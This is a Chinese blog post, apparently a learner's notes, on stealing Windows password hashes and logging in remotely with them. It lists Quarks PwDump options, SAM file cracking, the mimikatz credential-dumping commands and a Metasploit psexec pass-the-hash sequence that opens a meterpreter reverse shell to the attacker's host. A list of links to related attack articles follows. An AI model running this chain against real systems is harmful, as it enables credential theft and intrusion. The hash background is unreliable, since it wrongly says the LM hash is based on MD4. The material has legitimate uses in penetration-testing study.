WINDOWS 窃取hash实现远程登录

最新推荐文章于 2024-04-28 15:02:03 发布
最新推荐文章于 2024-04-28 15:02:03 发布
阅读量904 收藏 1
点赞数
文章标签: windows 哈希算法
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/l1593572468/article/details/121391636
版权

目录

前言

一、Windows常用用户

二、Windows密码安全

1. Quarks PwDump

 参数:

2.  SAMInside

3、Mimikatz

总结

前言

Windows哈希分为两组:LMhash和NTLMhash

例如:

user:501:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71

#内容的构成:
username : unique_identifier : LMhash : NThash

LMhash用于存储密码。

在W7及以上版本中LM是禁用的; 但是,当密码少于15个字符的时候,就在内存中启用LM。 这也是为什么管理员帐户的所有建议都是15个字符的原因。

LMhash已经过时了,它基于MD4,很容易破解。 它之所以依旧使用MD4,是因为Windows域需要较快的解密速度,同时这也使得它的安全性变得很差。

NThash根据用户输入的整个密码计算哈希值。

LMhash将密码拆分为两个7个字符的块,如果有缺省则进行填充。


NTLMhash用于域中主机上的本地身份验证。 如上所示,它是由LMhash和NThash组合而成。

NTLMhash与明文凭证效果是一样的。因此如果你无法获取明文凭据的时候,就可以通过哈希传递来通过身份验证,而不需要明文密码本身。


一、Windows常用用户

SYSTEM:               #本地机器上拥有最高权限的用户。
Administrator:        #本地机器上拥有最高权限的用户。
Guest:                   # 只拥有相对较少的权限,默认被禁用。


二、Windows密码安全


1. Quarks PwDump

Quarks PwDump 是一个Win32环境下的系统授权信息导出工具,目前除此之外没有任何一款工具可以导出如此全面的信息,支持这么多的OS版本,且相当稳定。

它目前可以导出 :

Local accounts NT/LM hashes + history       #本机NT/LM哈希+历史登录记录

Domain accounts NT/LM hashes + history   #域中的NT/LM哈希+历史登录记录

Cached domain password                            #缓存中的域管理密码


 参数:

quarks-pwdump.exe <options>
Options :
-dhl  --dump-hash-local
-dhdc --dump-hash-domain-cached
-dhd  --dump-hash-domain (NTDS_FILE must be specified)
-db   --dump-bitlocker (NTDS_FILE must be specified)
-nt   --ntds-file FILE
-hist --with-history (optional)
-t    --output-type JOHN/LC (optional, if no=>JOHN)
-o    --output FILE (optional, if no=>stdout)

Example: quarks-pwdump.exe --dump-hash-domain --with-history

2.  SAMInside

SAMInside为一款俄罗斯出品的Windows密码恢复软件,支持Windows NT/2000/XP/Vista操作系统,主要用来恢复Windows的用户登录密码。

使用说明:

导入本地系统和文件,当然,也可以从项目文件、文件导入,注意SAM文件是系统的SAM文件,一般在C:\WINDOWS\system32\config路径下。

 

按快捷键“F4”,视密码复杂程度、密码长度和机器性能,有时很快就等到结果;

如果时间过长,还可以暂停,保存破解状态留待下次接着运行。

3、Mimikatz

渗透测试常用工具,法国一个牛人写的轻量级调试器,可以帮助安全测试人员抓取Windows密码。

 使用说明:

privilege::debug                  //提升权限
sekurlsa::logonpasswords  //抓取密码

这个软件一个是对应32位系统的,一个是64位系统的,所以要先知道系统的属性,不然抓不到信息。

标明了“x64”,如果没有标明则说明您的电脑是32位的

同时需要以管理员权限运行,不然抓hash的时候会提示权限不足。

 

三、利用Hash远程登录系统

 利用获取到的hash:

aad3b435b51404eeaad3b435b51404ee:23a5c2470683a8b5375e9e30868b6412

打开metasploit

use exploit/windows/smb/psexec
 
set SMBUser username
 
set SMBPass 用户密码的hash值
 
set payload Windows/meterpreter/reverse_tcp
 
set rhost 要进行登录的主机ip
 
set lhost 本机ip
 
exploit


总结

多数借鉴网络上的文章形成一个自己的观点,因为水平不佳,还未入门有很多的不足,望指点。

Cheng-Ling
关注
[网络安全自学篇] 八十三.WHUCTF之CSS注入、越权、csrf-token窃取及XSS总结
杨秀璋的专栏
06-09 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了WHUCTF隐写和逆向题目,包括文字解密、图片解密、佛语解码、冰蝎流量分析、逆向分析。这篇文章将详细讲解一道CSS注入题目,包括CSS注入、越权、csrf-token窃取及CSP绕过,同时总结XSS绕过知识,希望对您有所帮助。第一次参加CTF,还是学到了很多东西。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢这些大佬和师傅们(尤其出题和解题的老师们)~
利用哈希传递登录 RDP 远程桌面
网络安全。
01-15 1435
Windows Server 2012 R2 采用了新版的 RDP 远程桌面协议,在这个新版协议中有一个 ”受限管理员” (Restricted Admin)的特性。相信渗透测试人员和系统管理员都会对这个特性有足够的兴趣,因为通过这个特性,我们可以实现哈希传递攻击并成功登录远程桌面。在抓取到的 Hash 无法破解的情况下,如果目标主机开启了 “Restricted Admin Mode” 也行,那么我们便可以使用 Hash 来直接实现 RDP 远程登录
Mssql 高级利用技巧 无需密码直连远程 mssql
qq_31812157的博客
05-27 327
因为 mssql 默认支持 windows 本地认证登录 ,一般情况下administrator是能直接用凭证登录而不需要数据库密码的,因此我们可以抓取管理员的hash,本地hash注入启动 sockscap ,之后用sockscap启动 ssms 或者 navicat,而由sockscap启动的进程也是继承了刚刚的管理员权限。关于本地 hash 注入可利用的方式其实还非常多,甚至可以稍微衍生一步想想,是不是所有基于 windows 认证登录的服务或者客户端连接工具,都可以进行类似的利用呢?
使用mimikatz利用哈希传递获取域控权限
qq_54713392的博客
06-29 1013
使用mimikatz利用哈希传递获取域控权限 靶机 window server 2012 IP 192.168.1.22 攻击机 window7 IP 192.168.1.34 (1)win2012 server获取目标hash对应用户名administrator,500,获取目标的NTLM哈希值可以使用mimikatz或者pwdump7 使用pwdump7,执行命令Pwdump7.exe 导出信息到1.txt中 复制出ntlm CE28B42F9943D0552385BC5F6338F9B9 (2)在
win10获取NTLM哈希
mengxp的博客
06-25 2565
https://www.insecurity.be/blog/2018/01/21/retrieving-ntlm-hashes-and-what-changed-technical-writeup/ Retrieving NTLM Hashes and what changed in Windows 10 Abstract Password are stored on hard dr...
1、使用Hash直接登录Windows
Fly_鹏程万里
05-17 3067
环境攻击机   :  kali linux 2018                        192.168.11.144目标主机:Windows server 2003 R2          192.168.11.133主要用途这个可以用于后渗透测试阶段,当我们获取到一个系统的一个WEBshell之后,我们可以上传gethashes.exe到该目标系统,之后在目标系统中获取当前登录用户的...
获取windows hash的几种方式
lansefly1990的专栏
02-26 6764
一、windows hash介绍 NTML hash是指在windows系统下的Security Account Manager中保存的用户密码hashhash的生成方法: 将明文口令转换成十六进制的格式; 转换成Unicode格式,即在每个字节之后添加0x00; 对Unicode字符串作MD4加密,生成32位的十六进制数字串; 如测试测试密码为haha123 转成十六进制为:...
使用Hash直接登录Windows
十年磨一剑,霜刃未曾试!
10-24 2665
首先,在本地主机(假设为目标主机)  新建一个wooyun用户,并为之设置密码,然后通过gethashes.exe获取到HASH  C:\>net user wooyun test  The command completed successfully.  C:\>gethashes.exe $local  1:1007:C2265B23734E0DACAAD3B435B
Windows server 2012 用户hash抓取方法研究(本地+域)
Coisini的博客
06-16 2165
为避免文章过长,这里就不贴出详细测试过程了。经过我的测试,发现本地用户hash抓取的方法中,以下几种方式是可行的: 注册表导出+cain Pwdump7.exe QuarksPwDump.exe mimikatz.exe 这几种方式都可以抓到本地用户hash,其中mimikatz.exe只能抓到登陆过的账户的hash值, 已经抓取不到明文的密码了,但是,有一些有意思的东西,直接上图: 仔细看图...
内网安全之:Windows 密码抓取
f_carey的博客
11-14 4073
郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 Windows 密码抓取 1 mimikatz 抓取密码 注:在 Windows 系统中抓取 NTLM Hash 值或明文密码,必须将权限提升到 System;lsass.exe 进程用于实现 Windows 的安全策略。 利用通过 SAM 和 System 文件获得 NTLM Hash gentilkiw.
《网络安全自学教程》- Windows安全标识符,身份鉴别和访问控制
wangyuxiang946的博客
04-23 5440
这篇文章详细介绍Windows和Linux如何标识用户,如何根据标识验证用户身份,如何根据用户身份做访问控制。
156-160.网络安全渗透测试—[Cobalt strike系列]—[域内渗透/信息收集/本地管理员/远程命令执行文件操作/Mimikatz/登录认证/自动化横向渗透/socks代理/中转监听器]
qwsn
04-02 1777
一、Cobalt Strike域内渗透 1 实验环境 1.1 实验拓扑 1.2 环境搭建 1.2.1 关闭各自域内防火墙 1.2.2 配置DC组策略:自动化让域用户加入到各自客户端的本地管理员组 1.2.3 DC组策略配置不当导致的权限问题:其他域用户获取本地管理员权限 1.2.4 WinRM 服务的配置不当导致的问题:在权限允许下可远程执行脚本命令 1.2.5 Win7虚拟机设置不休眠不关闭显示器:防止自动挂起导致的会话关闭 2 实验1:获取webserver跳板机会话+通过webserver的smb会话
如何抓取所有域用户的hash(win2008--win2012)
weixin_30763455的博客
06-07 459
如何抓取所有域用户的hashgethashes.exe 和gsecdump.exe都直接悲剧,这意味着想要轻量级的抓取所有域用户hash已经很难了。在线抓取失败,没办法只能祭出终极武器:离线抓取!第一种办法: vssown.vbs + libesedb + NtdsXtract详细出处参考这里:http://pauldotcom.com/2011/11/safely-dumping-hashes-...
第15篇:内网横向中windows各端口远程登录哈希传递的方法总结
ABC_123的博客
06-09 3304
Part1 前言随着人们的安全意识的逐步加强,企业内部的Windows服务器口令越来越复杂了,经常会遇到提权到windows服务器,获取了用户的密码hash,但是cmd5官网或者本地猜解都拿不到明文密码的情况。这时候就需要用到内网哈希传递技术了。哈希传递利用了NTLM认证的缺陷,使用用户的密码哈希值来进行NTLM认证。如果目标机器与获取hash值的机器的密码相同,就可......
Windows域内密码凭证获取 (゚益゚メ) 渗透测试
qq_53058639的博客
01-14 607
和我们常规Windows电脑不同的是,域中的账户密码采用的是集中管理而非本地模式,所以一旦我们拿到了域控(DC),就可以拿到域中所有用户的口令。注:下方所有演示的目标机是在一台域控中进行的,我们常规电脑和域中非域控电脑都无法进行下列操作!
windows下明文密码的存储
最新发布
m0_63111406的博客
04-28 966
windows的明文密码是通过LSA(Local Security Authority)进行存储加密的,当用户输入密码之后,密码会传递到LSA,LSA会对密码进行加密后保存在Windows注册表中的Security Accounts Manager数据库(SAM)中。密文存储在SAM数据库中的SAM文件中,该文件通常位于C:/windows/System32/config下,SAM是系统级文件,权限很高,一般无法直接打开该文件,会显示一直被占用,但是可以通过特殊的工具打开。
【内网学习】3.windows hash抓取
gclome的博客
03-05 2458
目录 6.1 mimikatz 6.2 wce 6.3PwDump 6.4 Quarks PwDump 6.5 prcodump+mimikatz 6.6 注册表+mimikatz 6.7 LaZagne 1 mimikatz 工具下载地址:Releases · gentilkiwi/mimikatz · GitHub 在cmd的命令里输入 privilege::debug //提升权限 sekurlsa::logonpasswords //抓取密码 结果如下,
Windows登录的明文密码是如何存储的? hashdump所抓取的密文分为哪两个板块?
繁星
04-26 986
它是一种质询/应答身份验证协议,用于在网络环境中验证用户的身份。NTLM协议既可以为工作组中的机器提供身份验证,也可以用于域环境身份验证。在NTLM认证的过程中,客户端回和服务器进行一系列的交互,以便于验证用户的身份;
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Cheng-Ling

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值